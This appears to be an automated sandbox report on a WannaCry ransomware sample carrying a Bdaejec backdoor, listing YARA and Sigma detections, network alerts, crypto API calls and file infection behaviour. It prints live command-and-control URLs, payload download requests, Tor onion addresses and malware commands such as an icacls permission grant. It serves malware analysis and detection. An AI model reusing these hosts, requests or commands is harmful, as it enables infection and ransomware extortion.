0.2.ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe.10000000.2.unpack	WanaCry	WanaCry Payload	kevoreilly	0xd5c4:$exename: @WanaDecryptor@.exe 0xd60c:$exename: @WanaDecryptor@.exe 0xd8c0:$res: %08X.res 0xd8b4:$pky: %08X.pky 0xd8a8:$eky: %08X.eky 0x5ba9:$taskstart: 8B 35 58 71 00 10 53 68 C0 D8 00 10 68 F0 DC 00 10 FF D6 83 C4 0C 53 68 B4 D8 00 10 68 24 DD 00 10 FF D6 83 C4 0C 53 68 A8 D8 00 10 68 58 DD 00 10 FF D6 53
0.2.ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe.400000.0.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
0.2.ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe.400000.0.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0x342d41:$x2: taskdl.exe 0x35962d:$x2: taskdl.exe 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0x359d91:$s2: Windows 10 --> 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x3591ff:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
0.2.ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe.400000.0.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
0.0.ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe.400000.0.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
0.0.ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe.400000.0.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0x342d41:$x2: taskdl.exe 0x35962d:$x2: taskdl.exe 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0x359d91:$s2: Windows 10 --> 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x3591ff:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
0.0.ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe.400000.0.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
Click to see the 4 entries

Sigma Signatures

System Summary

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, ProcessId: 4548, TargetFilename: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Start Menu\Programs\StartUp\~SD492B.tmp

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe", ParentImage: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, ParentProcessId: 4548, ParentProcessName: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, ProcessCommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, ProcessId: 5340, ProcessName: svchost.exe

Sigma detected: Use Short Name Path in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: C:\Users\user~1\AppData\Local\Temp\wBQInv.exe, CommandLine: C:\Users\user~1\AppData\Local\Temp\wBQInv.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\wBQInv.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\wBQInv.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\wBQInv.exe, ParentCommandLine: "C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe", ParentImage: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, ParentProcessId: 4548, ParentProcessName: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, ProcessCommandLine: C:\Users\user~1\AppData\Local\Temp\wBQInv.exe, ProcessId: 6768, ProcessName: wBQInv.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: cscript.exe //nologo m.vbs, CommandLine: cscript.exe //nologo m.vbs, CommandLine|base64offset|contains: (, Image: C:\Windows\SysWOW64\cscript.exe, NewProcessName: C:\Windows\SysWOW64\cscript.exe, OriginalFileName: C:\Windows\SysWOW64\cscript.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c 36751721951490.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7068, ParentProcessName: cmd.exe, ProcessCommandLine: cscript.exe //nologo m.vbs, ProcessId: 644, ProcessName: cscript.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe", ParentImage: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, ParentProcessId: 4548, ParentProcessName: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, ProcessCommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, ProcessId: 5340, ProcessName: svchost.exe

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 13.85.23.86 - Destination IP: 192.168.2.7

Timestamp:	2024-07-26T01:51:24.855536+0200
SID:	2022930
Source Port:	443
Destination Port:	49719
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.7 - Destination IP: 44.221.84.105

Timestamp:	2024-07-26T01:50:32.752778+0200
SID:	2807908
Source Port:	49700
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 13.85.23.86 - Destination IP: 192.168.2.7

Timestamp:	2024-07-26T01:50:46.300052+0200
SID:	2022930
Source Port:	443
Destination Port:	49705
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup - Source IP: 192.168.2.7 - Destination IP: 1.1.1.1

Timestamp:	2024-07-26T01:50:28.415174+0200
SID:	2838522
Source Port:	56636
Destination Port:	53
Protocol:	UDP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.7 - Destination IP: 44.221.84.105

Timestamp:	2024-07-26T01:50:28.954468+0200
SID:	2807908
Source Port:	49699
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.7 - Destination IP: 44.221.84.105

Timestamp:	2024-07-26T01:50:36.345422+0200
SID:	2807908
Source Port:	49701
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://ddos.dnsnb8.net:799/cj//k3.rar	URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rar	URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar	URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k3.rar-	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k3.rar_	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarE	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k3.rarcC:	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k3.rar5	Avira URL Cloud: Label: phishing

Antivirus detection for dropped file

Source: C:\@WanaDecryptor@.exe

Avira: detection malicious, Label: TR/FileCoder.724645

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\@WanaDecryptor@.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Code function: 0_2_00401861 CryptImportKey,	0_2_00401861
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Code function: 0_2_0040182C CryptAcquireContextA,	0_2_0040182C
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Code function: 0_2_004019E1 EnterCriticalSection,CryptDecrypt,LeaveCriticalSection,LeaveCriticalSection,memcpy,	0_2_004019E1
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Code function: 0_2_004018F9 CreateFileA,GetFileSize,GlobalAlloc,ReadFile,CryptImportKey,_local_unwind2,	0_2_004018F9
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Code function: 0_2_004018B9 CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,	0_2_004018B9
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Code function: 0_2_10003F00 GetFileAttributesA,GetFileAttributesA,CreateFileA,GetFileSize,GlobalAlloc,ReadFile,GetFileAttributesA,CryptImportKey,_local_unwind2,_local_unwind2,	0_2_10003F00
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Code function: 0_2_10003C00 CryptDestroyKey,	0_2_10003C00
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Code function: 0_2_10004040 CryptExportKey,GlobalAlloc,CryptExportKey,_local_unwind2,CreateFileA,WriteFile,_local_unwind2,	0_2_10004040
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Code function: 0_2_10004350 CryptGenKey,	0_2_10004350
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Code function: 0_2_10004170 CryptExportKey,CryptGetKeyParam,GlobalAlloc,CryptEncrypt,GlobalFree,	0_2_10004170
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Code function: 0_2_10004370 EnterCriticalSection,CryptEncrypt,LeaveCriticalSection,LeaveCriticalSection,	0_2_10004370
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Code function: 0_2_10003A80 GetFileAttributesA,GetFileAttributesA,CryptAcquireContextA,	0_2_10003A80
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Code function: 0_2_10003BB0 GetFileAttributesA,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,	0_2_10003BB0
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Code function: 0_2_10003AC0 CryptImportKey,CryptImportKey,CryptDestroyKey,	0_2_10003AC0
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Code function: 0_2_10003D10 GetFileAttributesA,CryptEncrypt,_local_unwind2,CryptDecrypt,GetFileAttributesA,strncmp,_local_unwind2,	0_2_10003D10
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Code function: 0_2_10004420 CryptGenRandom,	0_2_10004420
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Code function: 0_2_10004440 CryptAcquireContextA,wcsrchr,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,	0_2_10004440

Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Code function: 0_2_10002300 CloseHandle,SHGetFolderPathW,??2@YAPAXI@Z,??_U@YAPAXI@Z,swprintf,FindFirstFileW,??3@YAXPAX@Z,??3@YAXPAX@Z,wcscmp,wcscmp,wcscmp,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcscmp,wcscmp,wcscmp,wcsncpy,wcsncpy,wcsncpy,FindNextFileW,FindClose,_wcsnicmp,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,	0_2_10002300
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Code function: 0_2_10004A40 CloseHandle,SHGetFolderPathW,wcslen,SHGetFolderPathW,SHGetFolderPathW,wcslen,wcsrchr,wcschr,SHGetFolderPathW,wcslen,wcsrchr,swprintf,FindFirstFileW,wcscmp,wcscmp,swprintf,wcscmp,swprintf,FindNextFileW,FindClose,	0_2_10004A40
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Code function: 2_2_004129E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,	2_2_004129E2
Source: C:\Users\user\Desktop\taskdl.exe	Code function: 10_2_00401080 GetDriveTypeW,Sleep,swprintf,swprintf,FindFirstFileW,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,DeleteFileW,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,DeleteFileW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,	10_2_00401080

Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe

Code function: 2_2_00412B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

2_2_00412B8C

Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\ClipSVC\Archive\Apps\~SDF32F.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\ClipSVC\~SD7E4B.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\~SD9453.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\ClipSVC\GenuineTicket\~SDF33F.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\ClipSVC\Archive\~SD7E4C.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Caches\~SD7E4A.tmp	Jump to behavior

Networking

Found Tor onion address

Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000002.3719819751.000000001000C000.00000004.00001000.00020000.00000000.sdmp

String found in binary or memory: C13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94gx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zipP

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 799

Source: global traffic

TCP traffic: 192.168.2.7:49699 -> 44.221.84.105:799

Source: Joe Sandbox View

IP Address: 44.221.84.105 44.221.84.105

Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe

Code function: 2_2_00411099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep,

2_2_00411099

Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: ddos.dnsnb8.net

Source: wBQInv.exe, 00000002.00000003.1257865336.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, wBQInv.exe, 00000002.00000002.1607487222.0000000000413000.00000002.00000001.01000000.00000004.sdmp	String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
Source: wBQInv.exe, 00000002.00000003.1276194123.0000000000E77000.00000004.00000020.00020000.00000000.sdmp, wBQInv.exe, 00000002.00000002.1607845694.0000000000E16000.00000004.00000020.00020000.00000000.sdmp, wBQInv.exe, 00000002.00000002.1607845694.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp, wBQInv.exe, 00000002.00000003.1276194123.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp, wBQInv.exe, 00000002.00000002.1607845694.0000000000E77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
Source: wBQInv.exe, 00000002.00000003.1276194123.0000000000E77000.00000004.00000020.00020000.00000000.sdmp, wBQInv.exe, 00000002.00000002.1607845694.0000000000E77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarE
Source: wBQInv.exe, 00000002.00000002.1607845694.0000000000E77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
Source: wBQInv.exe, 00000002.00000002.1607845694.0000000000E77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar
Source: wBQInv.exe, 00000002.00000002.1607845694.0000000000E77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar-
Source: wBQInv.exe, 00000002.00000002.1607845694.0000000000E77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar5
Source: wBQInv.exe, 00000002.00000002.1607845694.0000000000E77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar_
Source: wBQInv.exe, 00000002.00000002.1607845694.0000000000E16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rarcC:
Source: m_danish.wnry.0.dr	String found in binary or memory: http://schemas.micr
Source: svchost.exe, 00000004.00000002.1430182760.000002DC08213000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.bingmapsportal.com
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000003.2291348728.0000000000963000.00000004.00000020.00020000.00000000.sdmp, ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000003.1316026746.000000000090E000.00000004.00000020.00020000.00000000.sdmp, ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000003.1798063418.0000000000960000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s
Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000003.2291348728.0000000000963000.00000004.00000020.00020000.00000000.sdmp, ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000003.1316026746.000000000090E000.00000004.00000020.00020000.00000000.sdmp, ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 00000000.00000003.1798063418.0000000000960000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how
Source: svchost.exe, 00000026.00000002.3709091663.00000168A0332000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.w3.
Source: svchost.exe, 00000004.00000003.1417833543.000002DC08257000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1431265329.000002DC08258000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
